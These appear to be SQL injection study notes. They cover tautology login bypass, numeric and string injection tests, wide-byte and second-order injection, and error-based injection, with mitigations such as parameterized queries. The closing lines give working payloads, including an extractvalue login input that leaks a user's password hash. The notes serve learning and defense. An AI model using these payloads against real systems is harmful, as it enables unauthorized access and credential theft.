注入类型

# 1. Tautology ("universal") injection input: 'or 1=1 -- '
#    Statement that results when the input is concatenated into the login query:
#    select * from users where username=' ' or 1=1 -- 'and password='admin4'
#    "or 1=1" makes the WHERE clause true for every row, and "-- " turns the
#    password check into a comment. The root cause is SQL built by string
#    concatenation; binding username and password as parameters keeps the quote
#    inside the value.

# I. Checking whether the parameter is concatenated as a number (unquoted)
# 1. ?id=1'
#    select * from users where id=1';   -> error when the context is numeric
# 2. ?id=1 and 1=1
SELECT *
FROM users
WHERE id = 1
  AND 1 = 1; # rows display normally; per the original note a string (quoted) context shows nothing because the whole input becomes one string literal
             # NOTE(review): if id is a numeric column, MySQL casts '1 and 1=1' to 1, so the row may still appear - confirm against the schema
# 3. ?id=1 and 1=2
SELECT *
FROM users
WHERE id = 1
  AND 1 = 2; # no error, and no rows are displayed


# II. String-type injection point, closed with a single quote
USE stu;
# 1. ?Semester=20201'
#    select * from stu.sc where Semester='20201'';   -> error (unbalanced quote)
# 2. ?Semester=20201' and '1'='1
SELECT *
FROM stu.sc
WHERE Semester = '20201'
  AND '1' = '1 '; # rows display normally
                  # NOTE(review): the trailing space inside '1 ' is kept from the page; whether it compares equal to '1' depends on the collation's pad attribute
# 3. ?Semester=20201' and '1'='2
SELECT *
FROM stu.sc
WHERE Semester = '20201'
  AND '1' = '2 '; # no error and nothing displayed (empty result set)


# Cases that come from building the statement as a dynamic string
# 1. Wide-byte injection: GBK %df \'
#    Arises when quotes are escaped byte-wise while the connection uses a
#    multi-byte charset such as GBK. Mitigation: set the connection charset
#    through the driver API and bind values with prepared statements.
# 2. Second-order injection
#    A value stored earlier is later concatenated into another statement.
#    Mitigation: parameterize every statement, including those that reuse
#    values read back from the database.


数字型判断:?id=1/0,若报错则为数字型(注意:MySQL 在 SELECT 中对除以零默认返回 NULL 并给出警告,此时表现通常是无显示而不是报错)。

 

报错注入示例: select * from test where ide = 1 and (updatexml(1,0x7e,3)); 由于 0x7e 即字符 ~,不符合 XPath 语法格式,updatexml 因此报出 XPath 语法错误。只有当应用把数据库错误信息原样回显给客户端时,这类报错才会泄露数据;防护上应关闭错误回显,并改用参数化查询。

uname=admin&passwd=1' and (extractvalue(1,concat(0x5c,(select password from (select password from users where username='admin1') b) ,0x5c)))--+&submit=Submit

 

(extractvalue (1,concat(0x5c,(select password from users where username='admin1' ),0x5c))

UPDATE users SET password = '1' and (extractvalue (1,concat(0x5c,(select password from users where username='admin1'),0x5c))) --+' WHERE username='$row1'"
